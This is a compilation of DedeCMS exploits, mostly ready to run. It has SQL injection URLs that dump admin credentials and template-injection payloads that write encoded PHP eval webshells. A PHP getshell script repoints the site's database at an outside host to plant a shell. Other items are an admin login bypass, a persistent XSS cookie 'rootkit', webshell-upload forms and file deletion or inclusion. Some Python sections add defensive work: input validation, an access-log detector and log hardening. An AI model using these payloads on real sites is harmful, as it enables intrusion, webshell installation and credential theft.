DedeCMS 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" item; in the local-address field enter:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant generates x.php (password: xiao), a one-line shell, directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-borne XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. From then on, visiting any of the URLs below, whatever the parameter, triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

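The gotopage reflection above persists because the page reads the value back from a cookie and echoes it into an attribute unchecked. The server-side fix is to treat the value as untrusted whichever source it comes from, validate it against an allow-list, and HTML-escape it on output. The Python below is an added example written for this page, not DedeCMS code; the function names, the allow-list pattern and the index.php default are assumptions chosen to illustrate the check.

```python
import html
import re
from urllib.parse import urlsplit

# Assumed allow-list: a same-site relative path, optionally with a simple query string.
SAFE_PATH = re.compile(r"^/?[A-Za-z0-9_./-]*(\?[A-Za-z0-9_=&%.-]*)?$")
DEFAULT_TARGET = "index.php"   # assumed fallback page


def safe_gotopage(value, default=DEFAULT_TARGET):
    """Return a redirect target that is safe both as a Location header and inside markup.

    A value carrying a scheme or host, a control character, a traversal segment or any
    character outside the allow-list is replaced by `default`. The same function must be
    applied to the query parameter and to the cookie: step 2 of the page works only
    because the cookie copy was reflected without this check.
    """
    if not value or len(value) > 256:
        return default
    if any(ch in value for ch in "\r\n\x00"):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or value.startswith(("//", "\\")):
        return default          # absolute, protocol-relative or javascript: style targets
    if ".." in value or not SAFE_PATH.match(value):
        return default
    return value


def render_gotopage_field(value):
    """Emit the hidden field with the attribute value HTML-escaped.

    Escaping is the second layer: even if validation is relaxed later, a quote or angle
    bracket can no longer terminate the value attribute the way the payload above does.
    """
    return '<input type="hidden" name="gotopage" value="%s" />' % html.escape(value, quote=True)


def handle_gotopage(query_value=None, cookie_value=None):
    """Model the login page: prefer the query parameter, fall back to the cookie,
    validate either source identically and return (target, hidden_field_markup)."""
    raw = query_value if query_value else cookie_value
    target = safe_gotopage(raw)
    return target, render_gotopage_field(target)


if __name__ == "__main__":
    # Constructed inputs: the page's payload prefix, a benign value and an external URL.
    for sample in ['"><script>alert(1)</script><x="', "dasdasdasda", "http://evil.example/"]:
        print(repr(sample), "->", handle_gotopage(sample))
```

Validation and escaping are deliberately separate functions: a redirect target needs the allow-list (escaping does nothing against `javascript:` in a Location header), while the attribute needs escaping (the allow-list is the part most likely to be loosened in later maintenance).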
DeDeCMS (Zhimeng) variable override getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
// Getshell() returns only the first response line (the status line);
// "OK" at offset 13 means the server answered "HTTP/1.1 200 OK".
if (strpos($exp, "OK") > 12) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = "80";
    // POST body: the _COOKIE[GLOBALS][cfg_*] fields are the variable-override
    // part; they replace the site's database settings for this request.
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        exit;
    }
    fwrite($ock, $data);
    while (!feof($ock)) {
        $exp = fgets($ock, 1024);
        return $exp;   // returns after the first line, i.e. the HTTP status line
    }
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

Prerequisite: the backend path must be known for this to work.

DedeCMS (Zhimeng) tag remote file write vulnerability
Precondition: you must have your own dede database prepared, then insert the record:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...

<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with our carefully crafted template. Suppose the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(construct this part here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports that the modification succeeded, we have changed the template path.
3. Visit the modified article:
Assuming the aid of the article just modified is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DedeCMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">更改</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

Zhimeng (DedeCMS) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

Zhimeng (DedeCMS) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 characters and the last 7 removed, which leaves a 20-character MD5 value; to get the 16-character MD5 from that, remove 3 characters from the front and 1 from the end.

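The password format described above, worked through in Python as an added example (not DedeCMS's own code): both the 20- and the 16-character forms are plain substrings of the unsalted MD5 digest, which is why a `pwd` value read out of the admin table can be checked directly against a candidate password, and why such a hash offers no protection once it has leaked. Function names are mine; the constant-time comparison is an added choice, and the derivation is checked against the well-known digest of the string "admin".

```python
import hashlib
import hmac


def md5_hex(password):
    """Full 32-character hex MD5 of the password, with no salt, as the page describes."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_pwd20(full_md5):
    """20-character form: drop the first 5 and the last 7 characters of the 32."""
    if len(full_md5) != 32:
        raise ValueError("expected a 32-character MD5 hex digest")
    return full_md5[5:-7]


def dede_pwd16(pwd20):
    """16-character form: drop 3 from the front and 1 from the end of the 20.

    Net effect: characters 8..23 of the full digest, i.e. the common
    16-character MD5 truncation.
    """
    if len(pwd20) != 20:
        raise ValueError("expected a 20-character digest")
    return pwd20[3:-1]


def classify_stored_hash(stored):
    """Guess which of the three forms a stored value is, by length and alphabet."""
    s = stored.strip().lower()
    if not s or any(c not in "0123456789abcdef" for c in s):
        return None
    return {32: "md5-32", 20: "dede-20", 16: "md5-16"}.get(len(s))


def verify_password(candidate, stored):
    """Derive the matching form from the candidate and compare in constant time."""
    kind = classify_stored_hash(stored)
    if kind is None:
        return False
    full = md5_hex(candidate)
    derived = {
        "md5-32": full,
        "dede-20": dede_pwd20(full),
        "md5-16": dede_pwd16(dede_pwd20(full)),
    }[kind]
    return hmac.compare_digest(derived, stored.strip().lower())


if __name__ == "__main__":
    # Constructed walk-through for the password "admin".
    full = md5_hex("admin")
    print("32:", full)
    print("20:", dede_pwd20(full))
    print("16:", dede_pwd16(dede_pwd20(full)))
```

`classify_stored_hash` is what you would run over a dumped `dede_admin` table during an incident review to confirm the column holds this truncated, unsalted format; every user whose hash is in that form needs a password reset rather than just a patch.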
Zhimeng (DedeCMS) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Zhimeng (DedeCMS) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

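Every getshell on this page that carries `_COOKIE[GLOBALS][cfg_*]`, `_POST[GLOBALS][cfg_*]` or bare `cfg_*` fields (the mytag_js.php script and form, the login.php bypass, and the select_soft_post.php form just above, which even says it needs register_globals) depends on request parameters being registered as configuration variables, so those parameter names are the thing to alert on. The Python below is an added detection example, not part of the original post and not DedeCMS code: it parses constructed combined-format access-log lines (IPs, timestamps and the member upload path are made up; the other paths are the ones named on this page), decodes each query string, and flags overriding parameter names, `{dede:` template tags inside values, and the SQL fragments used by the injection payloads above. Access logs carry only the query string; the same `inspect_params` applies to decoded POST bodies and cookies from a proxy or WAF log.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names a client must never be allowed to send: the page's payloads use
# them to override cfg_dbhost, cfg_basedir and friends through register_globals-style
# variable registration.
OVERRIDE_NAME = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_SESSION|_SERVER|_FILES)", re.I)
BRACKET_GLOBALS = re.compile(r"\[\s*GLOBALS\s*\]", re.I)
# Template tags have no business inside a request value.
TEMPLATE_TAG = re.compile(r"\{/?dede:", re.I)
# SQL fragments seen in the injection payloads on this page.
SQL_FRAGMENT = re.compile(r"updatexml\s*\(|union\s+select|\bselect\b.+\bfrom\b", re.I)

# Combined log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def inspect_params(params):
    """Return the reasons a list of (name, value) pairs is suspicious; empty means clean."""
    reasons = []
    for name, value in params:
        if OVERRIDE_NAME.match(name) or BRACKET_GLOBALS.search(name):
            reasons.append("override:" + name)
        if TEMPLATE_TAG.search(value):
            reasons.append("template-tag:" + name)
        if SQL_FRAGMENT.search(name + "=" + value):
            reasons.append("sql:" + name)
    return reasons


def inspect_target(target):
    """Decode the query string of a request target and inspect its parameters."""
    query = urlsplit(target).query
    return inspect_params(parse_qsl(query, keep_blank_values=True))


def scan_log(lines):
    """Yield one hit per log line whose query string trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_target(m.group("target"))
        if reasons:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "path": urlsplit(m.group("target")).path, "reasons": reasons})
    return hits


# Constructed sample log: the first five lines carry parameter patterns taken from
# this page's payloads, the last line is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9&nocache=true HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /dede/login.php?dopost=login&userid=admin&_POST%5BGLOBALS%5D%5Bcfg_dbuser%5D=root HTTP/1.1" 302 0
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /member/soft_add.php?url=a%7B/dede:link%7D%7Bdede:toby57%20name%3D%22%27%5D%3D0%3Bphpinfo()%3B//%22%7Dx%7B/dede:toby57%7D HTTP/1.1" 200 1024
198.51.100.7 - - [10/Oct/2023:13:56:30 +0000] "GET /plus/rss.php?tid=1&_Cs%5B%5D%5B1%5D=1&_Cs%5B2))%20AND%20updatexml(1,1,1)%23%27%5D%5B0%5D=1 HTTP/1.1" 200 2048
192.0.2.10 - - [10/Oct/2023:13:57:00 +0000] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 300
192.0.2.11 - - [10/Oct/2023:13:58:00 +0000] "GET /plus/list.php?tid=3&PageNo=2 HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["ip"], hit["path"], ", ".join(hit["reasons"]))
```

The `OVERRIDE_NAME` rule is the one to turn into a request-time block as well: a parameter whose name starts with `cfg_` or names a superglobal has no legitimate sender, so rejecting it costs nothing and removes the whole class at once rather than one endpoint at a time.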
Zhimeng (DedeCMS) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This exploits the error raised by a MySQL numeric field overflow together with the fact that DedeCMS records database error messages in a PHP file whose header performs no check.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.

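The digg_frame.php chain works because the database error trace is written into a .php file under the web root and the logged SQL is trusted to stay inside a block comment; the `*/ ... ?>` carried in the `mid` parameter ends that comment, and step 2's output shows the result. The Python below is an added example, not DedeCMS code, that models the fragile entry format next to a neutralised one and logs to a plain `.log` file outside the web root. `HEAD`/`TAIL`, the file name and the sample error text are assumptions chosen to reproduce the page's step-2 output; the sample SQL is the page's own.

```python
import os
import tempfile

# Assumed wrapper the trace file uses: one PHP block comment per entry.
HEAD = "<?php\n/*\n"
TAIL = "\n*/\n?>\n"


def naive_trace_entry(sql, err):
    """The fragile pattern: raw SQL text dropped into a .php file and relied
    upon to stay inside the block comment."""
    return HEAD + "Error: %s\nError sql: %s" % (err, sql) + TAIL


def neutralize_for_php_comment(text):
    """Break the only sequences that can end a block comment or open/close a PHP tag,
    keeping the record readable."""
    return text.replace("*/", "* /").replace("?>", "? >").replace("<?", "< ?")


def hardened_trace_entry(sql, err):
    """Same record with the terminators neutralised before it is wrapped."""
    body = neutralize_for_php_comment("Error: %s\nError sql: %s" % (err, sql))
    return HEAD + body + TAIL


def escapes_comment(entry):
    """True if text inside the body would reach the PHP parser: PHP closes the
    comment at the first '*/', so one occurrence in the body is enough."""
    body = entry[len(HEAD):-len(TAIL)]
    return "*/" in body


def write_trace(entry, log_dir=None):
    """Append the entry to a .log file with owner-only permissions in a directory
    that is not served; a non-executable extension outside the web root cannot
    become a webshell however hostile its content. A temp dir stands in for the
    real log directory when none is given."""
    if log_dir is None:
        log_dir = tempfile.mkdtemp(prefix="trace-")
    path = os.path.join(log_dir, "mysql_error_trace.log")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)
    with os.fdopen(fd, "a", encoding="utf-8") as fh:
        fh.write(entry)
    return path


def read_trace(path):
    with open(path, encoding="utf-8") as fh:
        return fh.read()


# Constructed reproduction of the page's step-2 record: the SQL the application
# logged already contains the closing delimiters supplied through `mid`.
SAMPLE_ERR = "Illegal double '1024e1024' value found during parsing"
SAMPLE_SQL = ("Select goodpost,badpost,scores From `gxeduw_archives` "
              "where id=1024e1024 limit 0,1; */eval($_POST[x]);var_dump(3);?>")

if __name__ == "__main__":
    print("naive escapes comment:", escapes_comment(naive_trace_entry(SAMPLE_SQL, SAMPLE_ERR)))
    print("hardened escapes comment:", escapes_comment(hardened_trace_entry(SAMPLE_SQL, SAMPLE_ERR)))
    print("written to:", write_trace(hardened_trace_entry(SAMPLE_SQL, SAMPLE_ERR)))
```

Neutralising the delimiters is a second line of defence only; the durable fix is the one `write_trace` models, since a log the web server will never execute does not care what it contains.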
Zhimeng (DedeCMS) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*